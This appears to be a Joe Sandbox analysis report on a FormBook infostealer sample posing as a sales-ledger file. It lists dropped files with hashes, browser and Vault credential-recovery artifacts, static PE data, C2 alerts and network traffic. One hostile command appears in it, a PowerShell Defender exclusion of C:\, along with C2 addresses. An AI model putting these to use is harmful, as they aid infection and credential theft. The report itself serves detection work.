08042021New-PurchaseOrder.exe | malicious
RFQ-034.exe | malicious
Payment Slip.exe | malicious
Revised Invoice No CU 7035.exe | malicious
Sales_Order description.exe | malicious
Outstanding invoices.exe | malicious
Q88_Bulk Carrier.exe | malicious
Payment _Slip copy.exe | malicious
MV. HUA KAI V-2023.exe | malicious
Order_April shipment.exe | malicious
INVOICE for Order PIEX310113978.exe | malicious
Krishna Gangaa Enviro System Pvt Ltd.exe | malicious
TT SWIFT COPY.exe | malicious
PO75773937475895377.exe | malicious
SecuriteInfo.com.Artemis5C44BBDCCDFF.4370.exe | malicious
Download Report.06.05.2021.exe | malicious
Outstanding invoices.exe | malicious

                                                                                                              Created / dropped Files

                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Require your Sales Ledger from 01-April-2020.exe.log
                                                                                                              Process:C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:modified
                                                                                                              Size (bytes):1119
                                                                                                              Entropy (8bit):5.356708753875314
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzd
                                                                                                              MD5:3197B1D4714B56F2A6AC9E83761739AE
                                                                                                              SHA1:3B38010F0DF51C1D4D2C020138202DABB686741D
                                                                                                              SHA-256:40586572180B85042FEFED9F367B43831C5D269751D9F3940BBC29B41E18E9F6
                                                                                                              SHA-512:58EC975A53AD9B19B425F6C6843A94CC280F794D436BBF3D29D8B76CA1E8C2D8883B3E754F9D4F2C9E9387FE88825CCD9919369A5446B1AFF73EDBE07FA94D88
                                                                                                              Malicious:true
                                                                                                              Reputation:moderate, very likely benign file
                                                                                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):14734
                                                                                                              Entropy (8bit):4.993014478972177
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                                                              MD5:8D5E194411E038C060288366D6766D3D
                                                                                                              SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                                                              SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                                                                              SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                                                              Malicious:false
                                                                                                              Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):22192
                                                                                                              Entropy (8bit):5.605242149765194
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:ctCDC03SDl1u2b+JwSBKnIRultIo3D7Y9gxSJUeRe1BMrmbZaAV7E5WDm64I+iaS:HSDXu2kw4KOultp33xXeNq34pC
                                                                                                              MD5:DCA964DEC7B92F4DE1CDCFF994619018
                                                                                                              SHA1:47ED9EC01C5E990CF03D373489CADC37C4602014
                                                                                                              SHA-256:B0B560F92DD0FA69E5591F7ABADA4FE9BAC9193DCD11C136C75C14A1271D3199
                                                                                                              SHA-512:849187A8AE0C1B005C3351166449565CA89D203DD1B9E75EA82723ED7C3B1834E2AE5BEAEE1245328EFF2BE7C1EA02157D0F1EF31AF324538E855D92D5C559C0
                                                                                                              Malicious:false
                                                                                                              Preview: @...e...........e.......................;............@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                              C:\Users\user\AppData\Local\Temp\AdvancedRun.exe
                                                                                                              Process:C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):91000
                                                                                                              Entropy (8bit):6.241345766746317
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                              MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                              SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                              SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                              SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: Account Confirmation.exe, Detection: malicious, Browse
                                                                                                              • Filename: Download Report.08.04.2021.pdf.exe, Detection: malicious, Browse
                                                                                                              • Filename: ORDER-02188.exe, Detection: malicious, Browse
                                                                                                              • Filename: 08042021New-PurchaseOrder.exe, Detection: malicious, Browse
                                                                                                              • Filename: RFQ-034.exe, Detection: malicious
                                                                                                              • Filename: Payment Slip.exe, Detection: malicious
                                                                                                              • Filename: Revised Invoice No CU 7035.exe, Detection: malicious
                                                                                                              • Filename: Sales_Order description.exe, Detection: malicious
                                                                                                              • Filename: Outstanding invoices.exe, Detection: malicious
                                                                                                              • Filename: Q88_Bulk Carrier.exe, Detection: malicious
                                                                                                              • Filename: Payment _Slip copy.exe, Detection: malicious
                                                                                                              • Filename: MV. HUA KAI V-2023.exe, Detection: malicious
                                                                                                              • Filename: Order_April shipment.exe, Detection: malicious
                                                                                                              • Filename: INVOICE for Order PIEX310113978.exe, Detection: malicious
                                                                                                              • Filename: Krishna Gangaa Enviro System Pvt Ltd.exe, Detection: malicious
                                                                                                              • Filename: TT SWIFT COPY.exe, Detection: malicious
                                                                                                              • Filename: PO75773937475895377.exe, Detection: malicious
                                                                                                              • Filename: SecuriteInfo.com.Artemis5C44BBDCCDFF.4370.exe, Detection: malicious
                                                                                                              • Filename: Download Report.06.05.2021.exe, Detection: malicious
                                                                                                              • Filename: Outstanding invoices.exe, Detection: malicious
                                                                                                              C:\Users\user\AppData\Local\Temp\DB1
                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                              Category:dropped
                                                                                                              Size (bytes):40960
                                                                                                              Entropy (8bit):0.792852251086831
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                              MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                              SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                              SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                              SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                              Malicious:true
                                                                                                              C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe
                                                                                                              Process:C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):736256
                                                                                                              Entropy (8bit):7.158845349064943
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:JLwe/ZRRUxLGX9eW++HhtUnNJ2WD9cgMuwS2T8Xo2i10OlYKit:q0HRYLov+Yh+NzxFWgXh5K
                                                                                                              MD5:C7C27E1859F1593AEDB1EEBF0A15175E
                                                                                                              SHA1:DEB5544C037A7757462AFAB46AE2CA14A8F7F945
                                                                                                              SHA-256:D7E71646C9427067E810E1B278BEB6AD1F07E6B0C5003D9BE2611178E4F5470C
                                                                                                              SHA-512:7F8E332B6163EC2B052EAD9C9958C88DEAD193BEB5C6D93851190C9DFC27A6A78FD7FF461FB363DA6809F1134460F255DCA918BA3A23019A64870BEEDBCE2033
                                                                                                              Malicious:true
                                                                                                              Yara Hits:
                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe, Author: Joe Security
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                                                                              C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe:Zone.Identifier
                                                                                                              Process:C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):26
                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                              Malicious:true
                                                                                                              Preview: [ZoneTransfer]....ZoneId=0
                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2uarlegt.1xt.ps1
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:very short file (no magic)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:U:U
                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                              Malicious:false
                                                                                                              Preview: 1
                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ai155hga.ohd.psm1
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:very short file (no magic)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:U:U
                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                              Malicious:false
                                                                                                              Preview: 1
                                                                                                              C:\Users\user\AppData\Roaming\28L0N9-0\28Llogim.jpeg
                                                                                                              Process:C:\Windows\SysWOW64\cmmon32.exe
                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                                                              Category:dropped
                                                                                                              Size (bytes):95677
                                                                                                              Entropy (8bit):7.919177855177055
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:CGA3mwPhxXv4zyIgZKsHdnPdT6KmS3TffgjQ0NzCZcjzgbvdHvPv30U+rMbs0kzM:hUmqXvHrDHdPdTT3sZEZUWv5PvorMbss
                                                                                                              MD5:C0122538B0EEFF8698CF7E0F890D24D2
                                                                                                              SHA1:2823E6C629CB43FD4AC2D1AD2DE750FC3457AB0F
                                                                                                              SHA-256:23955408BAB3083853CBF6C47A1FD8BBAD97CBD5A8A8C40556160A7A389AFF69
                                                                                                              SHA-512:05D72B0D02CB551251854067399F23532D901374383BEA7D6A1FC25909FE0CDA7B3C4EA50331162647835A5A3C7F3CEFC27E77489494B057E3EB7CEF3C9AC507
                                                                                                              Malicious:false
                                                                                                              C:\Users\user\AppData\Roaming\28L0N9-0\28Llogrg.ini
                                                                                                              Process:C:\Windows\SysWOW64\cmmon32.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):38
                                                                                                              Entropy (8bit):2.7883088224543333
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:rFGQJhIl:RGQPY
                                                                                                              MD5:4AADF49FED30E4C9B3FE4A3DD6445EBE
                                                                                                              SHA1:1E332822167C6F351B99615EADA2C30A538FF037
                                                                                                              SHA-256:75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
                                                                                                              SHA-512:EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
                                                                                                              Malicious:false
                                                                                                              Preview: ....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....
                                                                                                              C:\Users\user\AppData\Roaming\28L0N9-0\28Llogri.ini
                                                                                                              Process:C:\Windows\SysWOW64\cmmon32.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):40
                                                                                                              Entropy (8bit):2.8420918598895937
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:+slXllAGQJhIl:dlIGQPY
                                                                                                              MD5:D63A82E5D81E02E399090AF26DB0B9CB
                                                                                                              SHA1:91D0014C8F54743BBA141FD60C9D963F869D76C9
                                                                                                              SHA-256:EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
                                                                                                              SHA-512:38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
                                                                                                              Malicious:true
                                                                                                              Preview: ....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....
                                                                                                              C:\Users\user\AppData\Roaming\28L0N9-0\28Llogrv.ini
                                                                                                              Process:C:\Windows\SysWOW64\cmmon32.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):210
                                                                                                              Entropy (8bit):3.518213280978656
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:tGQPYlIaExGNlGcQga3Of9y96GO4elMrsEoY:MlIaExGNYvOI6x4FrYY
                                                                                                              MD5:8E072F1CA3E4F3D5FC69A2B9663D2544
                                                                                                              SHA1:BBA45FE6AC81F235ED17E164CFE32E2C92931AF2
                                                                                                              SHA-256:8CE7C9F67BA5EC254BBFCF5F45E8EE2822BAF2B36313C69B51E887AD93B6044A
                                                                                                              SHA-512:BCF6F6A9942A1A6F01A5A7ED099EDDE188754BAD6A575962B1A250FF43480EE08CC14A94F76B1A8E594B40A60C0E23758F0F8B9B69A19842D158009ABE7170D5
                                                                                                              Malicious:true
                                                                                                              Preview: ...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.........N.a.m.e.:...M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.t.a.r.g.e.t.=.S.S.O._.P.O.P._.D.e.v.i.c.e.....I.d.:...0.2.l.r.x.b.p.m.p.x.h.f.b.m.a.q.....A.u.t.:.......P.a.s.s.:.......
                                                                                                              C:\Users\user\Documents\20210412\PowerShell_transcript.928100.qQXLRrJV.20210412144010.txt
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):5048
                                                                                                              Entropy (8bit):5.380112009222799
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:BZHhGN5iqDo1ZyZ7hGN5iqDo1ZAM6UjZxhGN5iqDo1ZdFEEcZc:wWVE
                                                                                                              MD5:C71DC0FC03110798155EB83AEC4309DF
                                                                                                              SHA1:41EF12380C0EA508955E548565BB6B8B82D1A18E
                                                                                                              SHA-256:CB36DDA171E05116B9C89061B88E7217A4D06F83DC3BABA7281009ED4A694478
                                                                                                              SHA-512:C2D58E3AD65405D9B524D4C591826C850E14687C3376912CEA2CAA82E3D55646E6E945E2055CAB8B5F28202E005BD28C03E6C733B99E5FBB1F2BD0023E033CA1
                                                                                                              Malicious:false
                                                                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210412144028..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -ExclusionPath C:\..Process ID: 2420..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210412144028..**********************..PS>Add-MpPreference -ExclusionPath C:\..**********************..Windows PowerShell transcript start..Start time: 20210412144312..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -Exclus

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Entropy (8bit):7.158845349064943
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                              File name:Require your Sales Ledger from 01-April-2020.exe
                                                                                                              File size:736256
                                                                                                              MD5:c7c27e1859f1593aedb1eebf0a15175e
                                                                                                              SHA1:deb5544c037a7757462afab46ae2ca14a8f7f945
                                                                                                              SHA256:d7e71646c9427067e810e1b278beb6ad1f07e6b0c5003d9be2611178e4f5470c
                                                                                                              SHA512:7f8e332b6163ec2b052ead9c9958c88dead193beb5c6d93851190c9dfc27a6a78fd7ff461fb363da6809f1134460f255dca918ba3a23019a64870beedbce2033
                                                                                                              SSDEEP:12288:JLwe/ZRRUxLGX9eW++HhtUnNJ2WD9cgMuwS2T8Xo2i10OlYKit:q0HRYLov+Yh+NzxFWgXh5K

                                                                                                              File Icon

                                                                                                              Icon Hash:0a9aa29aa2a28200

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x47d242
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                                                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                              Time Stamp:0x607421F5 [Mon Apr 12 10:33:25 2021 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:v4.0.30319
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              jmp dword ptr [00402000h]
                                                                                                              add byte ptr [eax], al

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x7d1e8          0x57          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x7e000          0x383d8       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xb8000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
.text   0x2000           0x7b248       0x7b400   False     0.976667485421   data       7.9825675946    IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0x7e000          0x383d8       0x38400   False     0.171124131944   data       3.98776782923   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xb8000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name           RVA      Size     Type                                                                                           Language  Country
RT_ICON        0x7e550  0x330    data
RT_ICON        0x7e880  0x130    data
RT_ICON        0x7e9b0  0xb0     GLS_BINARY_LSB_FIRST
RT_ICON        0x7ea60  0x298f   PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON        0x813f0  0x668    data
RT_ICON        0x81a58  0x2e8    dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 1, next used block 131072
RT_ICON        0x81d40  0x1e8    data
RT_ICON        0x81f28  0x128    GLS_BINARY_LSB_FIRST
RT_ICON        0x82050  0x24aa   PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON        0x844fc  0xea8    data
RT_ICON        0x853a4  0x8a8    dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
RT_ICON        0x85c4c  0x6c8    data
RT_ICON        0x86314  0x568    GLS_BINARY_LSB_FIRST
RT_ICON        0x8687c  0x154e   PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON        0x87dcc  0x10828  dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
RT_ICON        0x985f4  0x94a8   data
RT_ICON        0xa1a9c  0x67e8   data
RT_ICON        0xa8284  0x5488   data
RT_ICON        0xad70c  0x4228   dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
RT_ICON        0xb1934  0x25a8   data
RT_ICON        0xb3edc  0x10a8   data
RT_ICON        0xb4f84  0x988    data
RT_ICON        0xb590c  0x468    GLS_BINARY_LSB_FIRST
RT_GROUP_ICON  0xb5d74  0x148    data
RT_VERSION     0xb5ebc  0x368    data
RT_MANIFEST    0xb6224  0x1b4    XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

Imports

DLL          Import
mscoree.dll  _CorExeMain

Version Infos

Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Copyright 2020
Assembly Version  1.0.0.0
InternalName      Bogxyjdq.exe
FileVersion       1.0.0.0
CompanyName
LegalTrademarks
Comments          Excel Macro Exploit
ProductName       Excel Macro Exploit
ProductVersion    1.0.0.0
FileDescription   Excel Macro Exploit
OriginalFilename  Bogxyjdq.exe

                                                                                                              Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP      Dest IP
04/12/21-14:41:17.437400  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49737        80         192.168.2.3    185.53.179.90
04/12/21-14:41:17.437400  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49737        80         192.168.2.3    185.53.179.90
04/12/21-14:41:17.437400  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49737        80         192.168.2.3    185.53.179.90
04/12/21-14:41:17.477701  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49737      185.53.179.90  192.168.2.3

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              Apr 12, 2021 14:41:19.731820107 CEST4973980192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:19.731823921 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.731931925 CEST4973980192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:19.772171974 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.772270918 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.772305965 CEST4973980192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:19.772356033 CEST4973980192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:19.772377968 CEST4973980192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:19.772433996 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.772461891 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.772605896 CEST4973980192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:19.772628069 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.772783995 CEST4973980192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:19.772921085 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.773015976 CEST4973980192.168.2.3185.53.179.90
